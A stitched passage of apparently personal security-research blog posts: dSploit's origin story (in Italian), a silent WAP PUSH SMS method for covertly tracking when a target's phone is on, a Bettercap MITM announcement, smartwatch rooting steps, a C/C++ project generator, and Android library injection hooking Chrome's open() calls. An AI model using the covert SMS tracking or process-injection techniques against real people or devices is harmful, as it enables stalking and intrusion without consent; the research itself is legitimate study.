ma lo stipendio è altissimo, il lavoro eccitante e gli orari molto flessibili ... in questo periodo di tempo ho conosciuto molte nuove persone, alcune delle quali solo di passaggio altre, sono sicuro, saranno amiche per sempre ... ho avuto modo di permettermi cose che prima non potevo neanche immaginare, ho girato il mondo e visto più nazioni straniere in questo anno che in tutto il resto della mia vita, ho potuto aiutare tante persone a me care che avevano bisogno di un aiuto concreto, ma soprattutto ho capito una cosa dei soldi ... non danno la felicità, ma danno la libertà necessaria per crearsela, e per tutta la vita la libertà è l'unica vera cosa che ho inseguito costantemente.

Tutte cose che ( e per chi ha seguito bene sarà risultato ovvio dove volevo andare a parare ),
senza quei soldi non mi sarei mai potuto permettere e quei soldi venivano da un idea che
avevo deciso di rendere libera ... ora il progetto è stato forkato, scaricato, clonato, migliorato ed appartiene alla comunità così come è giusto che sia.

Ho voluto condividere questa storia per raccontare un po di me, sfatare alcuni "miti" dietro la nascita di dSploit ma soprattutto per dare una speranza a tutti coloro che come me passano nottate insonni in nome di un idea ... siate liberi ragazzi, fate in modo che le vostre idee vengano preservate e vi portino li dove sono destinate a portarvi.

(Un)fortunately Google decided to remove that API, it’s still not sure if they did it for security related purposes or during some refactoring of their IPC IBinder mechanism, but nowadays it’s no more available unless you use some very old phones/firmwares ( on most devices they removed the ttyUSB serial interfaces to send AT commands to the GSM modem as well ).

Until a couple of months ago, when I found the SmsManager.sendDataMessage API which, apparently, it’s not used anywhere ( if you search for it you’ll find only a few examples, but nothing regarding how to use it with manually encoded PDUs ).
Using this API we’re able to manually encode our SMS, moreover we can specific a “port” as one of its arguments which will identify what kind of sms we’re gonna send, in this post I’ll talk about port 2948, namely the port used to send WAP PUSH notifications.

WAP PUSH messages were an old mechanism to basically force a remote device to visit a URL encoded in the SMS payload itself ( I know, security wise it was very dumb, but we’re talking about the 90s ), this specific request is called a “Service Load” (SL) request, where an XML payload like the following was encoded in a binary form and sent along the PDU to the device.

<?xml version="1.0"?>  
<!DOCTYPE sl PUBLIC "-//WAPFORUM//DTD SL 1.0//EN"  
                    "www.wapforum.org/DTD/sl.dtd">
<sl href="http://some-evil-site.com/evil-content.html"/>  

Nowadays this protocol is no more handled for obvious reasons … I said handled and not supported because the GSM basebands software is actually still able to receive it, but the higher level software ( the OS and its components ) will simply ignore it.
For instance, on Android 5.0 you can see the following logs ( logcat -b radio ) when the device receives such payload:

D/WAP PUSH( 1287): Rx: 0a0603...  
D/RILC    (  185): SOCKET RIL_SOCKET_1 REQUEST: SMS_ACKNOWLEDGE length:20  
D/RILC    (  185): RequestComplete, RIL_SOCKET_1  
E/RILC    (  185): Send Response to RIL_SOCKET_1  
D/RILJ    ( 1287): [9277]< SMS_ACKNOWLEDGE  [SUB0]  
V/WAP PUSH( 1287): appid found: 2:application/vnd.wap.slc  
W/WAP PUSH( 1287): wap push manager not found!  
V/WAP PUSH( 1287): fall back to existing handler  
V/WAP PUSH( 1287): Delivering MMS to: com.google.android.talk com.google.android.apps.hangouts.sms.MmsWapPushDeliverReceiver  

So the event is delivered to the Google Hangouts application ( the default SMS/MMS handler on my phone ) which simply will ignore this kind of payloads unless they are simple MMS instead of anything else ( WAP PUSHes in our case ):

public class MmsWapPushDeliverReceiver extends BroadcastReceiver  
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if (("android.provider.Telephony.WAP_PUSH_DELIVER".equals(paramIntent.getAction())) && ("application/vnd.wap.mms-message".equals(paramIntent.getType())))
      RealTimeChatService.a(paramIntent.getByteArrayExtra("data"));
  }
}

This means that, although the device will receive the data, no kind of notification will be shown to the user and the data itself won’t be saved anywhere in the system, but simply discarded.

Having said that, there’s a tiny detail that’s very handy for us … after delivering the WAP PUSH message, the destination operator BTS will reply to us with a delivery report. This report will be sent only if the device is turned on and completely able to receive the message ( turned on and with enough GSM network coverage ).
In fact, the sendDataMessage API accepts as its last argument a delivery PendingIntent, in other words our application will be informed as soon as the delivery report will be sent back.

We can take advantage of this to do the following:

• Craft a WAP PUSH message encoding it manually.
• Pass it to the sendDataMessage API and register a delivery intent.
• The WAP PUSH will be sent to the target mobile phone and we’ll receive the delivery notification if the phone is turned on, if it’s not we’ll receive it as soon as it will be turned on.
• The target user won’t notice absolutely anything.

So, we can basically track a target user GSM network activity invisibly, knowing exactly when the target’s device is turned on without him having a single chance to notice anything.

Here's a very simple PoC application I've made to show how to use such API, the same kind of PDU can be sent using a normal GSM serial dongle and some software like Gnokii.

Bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

MOTIVATIONS

Yet another MITM tool? C'mon, really?!!?

This is exactly what you are thinking right now, isn't it? :D
But allow yourself to think about it for 5 more minutes ... what you should be really asking is:

Does a complete, modular, portable and easy to extend MITM tool actually exist?

If your answer is "ettercap", let me tell you something:

• ettercap was a great tool, but it made its time.
• ettercap filters do not work most of the times, are outdated and hard to implement due to the specific language they're implemented in.
• ettercap is freaking unstable on big networks ... try to launch the host discovery on a bigger network rather than the usual /24 ;)
• yeah you can see connections and raw pcap stuff, nice toy, but as a professional researcher I want to see only relevant stuff.
• unless you're a C/C++ developer, you can't easily extend ettercap or make your own module.

Indeed you could use more than just one tool ... maybe arpspoof to perform the actual poisoning, mitmproxy to intercept HTTP stuff and inject your payloads and so forth ... I don't know about you, but I hate when I need to use a dozen of tools just to perform one single attack, especially when I need to do some black magic in order to make all of them work on my distro or on OSX ... what about the KISS principle?

So bettercap was born ( isn't the name pure genius? XD ).

You can find infos on the project on the official website or on its github repository.

Enjoy!

Unfortunately, being it a relatively new device, there aren't many informations on the web on how to root it, so I started asking for infos on XDA and finally, with the help of suzook and suljo94 I've managed to do it.
Apparently, almost the same procedure of the LG G Watch R applies, but in order to make it work on the Urbane I needed different files, namely:

• The specific TWRP recovery image for this device. download
• The Wear version of the SuperSU update zip. download

These are the simple steps to follow in order to root the LG Watch Urbane:

1. Connect your device to the USB port of your computer ( I take for granted you have adb and fastboot installed ).
2. Enable the developer menu, going into Settings -> Informations and tapping on the "Build" entry for 7 times.
3. Go to the unlocked Developer Options settings menu and enable ADB Debugging.
4. Unplug the device and plug it back, it should ask you if you want to allow your computer to connect to it, of course, allow it.
5. Now open a terminal, and execute adb reboot bootloader to get into the bootloader.
6. To unlock it, execute fastboot oem unlock ( This will wipe your device data! ).
7. Setup the wiped device, and execute steps from 1 to 4 again.
8. Again, adb reboot bootloader.
9. Flash the TWRP image by issuing fastboot flash recovery twrp-2.8.6.1-bass.img ( make sure you have the img file in the same folder you're working in ).
10. Now copy the SuperSU zip archive adb push Wear-SuperSU-v2.40.zip /sdcard/.
11. Start the TWRP recover by executing adb reboot recovery.
12. Use the Install option, select the zip file of SuperSU and flash it ( do not enable signature verification or the whole process will fail! ).
13. Reboot your device and you're ready to go, enjoy the root ^_^

• Create project folder.
• Create src and include folders.
• Fill them with a basic main.c(pp)
• Create the Makefile, fill tue rules.

What about remembering all the times how to set the SYSROOT variable when I'm using the Android NDK?
Or maybe create the CMakeLists.txt and try to remember each directive, which I don't, so I find myself googling for the same kind of stuff over and over ... and btw it's funny since I happen to use CMake for years now.

So I decided that I had enough of this, when I want to test just a simple line of C/C++ code it takes me more time to create all the project folder tree than to write the code itself ... and FIDO was born.

FIDO is a minimalistic C/C++ IDE-agnostic project generator supporting various templates, currently it sopports:

     android-make-c : Create a native Android C project based on Makefile.
   android-make-cpp : Create a native Android C++ project based on Makefile.
android-ndk-build-c : Create a native Android C project based on the ndk-build utility.
            cmake-c : Create a C project based on CMake.
          cmake-cpp : Create a C++ project based on CMake.
             make-c : Create a C project based on Makefile.
           make-cpp : Create a C++ project based on Makefile.

The installation is easy, I'll package it for PIP soon, but for now you just need to:

python setup.py build
sudo python setup.py install

Once you installed it, all you need to do is to invoke fido create [template-name] [project-name] and it will automagically create everything for you in less than one second.

This is an ASCII cast you can watch as an example:

Enjoy ^_^

TL;DR

I've updated the source code of the arminject project on github adding a library that once injected into a process will hook its open API and print some logs to the logcat, the make test command will basically start a new Chrome browser process, use the injector discussed in the previous post to inject libhook.so into it and wait for its logs to appear, an example output could be like:

@ Attaching to process com.android.chrome ...
@ Injecting library /data/local/tmp/libhook.so into process 8511.
@ Calling dlopen in target process ...
@ dlopen returned 0xb5202dc4

I/LIBHOOK ( 8511): [8511] open('/data/data/com.android.chrome/app_chrome/.com.google.Chrome.gJY5h4', 194)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/data/data/com.android.chrome/shared_prefs/com.android.chrome_preferences.xml', 577)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/data/data/com.android.chrome/files/android_ticl_service_state.bin', 0)
I/LIBHOOK ( 8511): [8511] open('/data/data/com.android.chrome/files/ticl_storage.bin', 0)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/data/data/com.android.chrome/files/android_ticl_service_state.bin', 577)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
I/LIBHOOK ( 8511): [8511] open('/dev/ashmem', 2)
...
...

Hooking System Functions

As I basically wrote everywhere in the source to avoid any kind of misunderstanding, the libhook.so code is almost totally based on Andrey Petrov's blog post "Android hacking: hooking system functions used by Dalvik", although I had to modify and fix its original version since it didn't work ( page align errors, memory protection faults and so forth ).

The main concept is quite simple yet neat, once the library is injected inside the target process, its constructor will be executed.
A constructor function is declared like this:

__attribute__((constructor)) somefunction() {  
    // something
}

This means that "somefunction" will be executed as soon as the library is loaded.

This allowed me to exploit Petrov's code at runtime and patch the process relocation table, an ELF structure that holds the addressess of system functions used by the program.
The logic steps to do this are:

• Get the base pointer of the module using dlopen.
• Given its pointer, lookup the symbol ( open in our case ) inside its (sym|str)tab.
• Search the symbol inside the reloc table by index.
• Backup its original address and finally patch it with our own hook function address.

Once the hook function is called, it will log its parameters and then call the original function we previously backupped:

int hook_open(const char *pathname, int flags) {  
    HOOKLOG( "[%d] open('%s', %d)", getpid(), pathname, flags );

    return __open( pathname, flags );
}

Obviously this method can be applied to any kind of function, even Dalvik high level native API.

Enjoy :)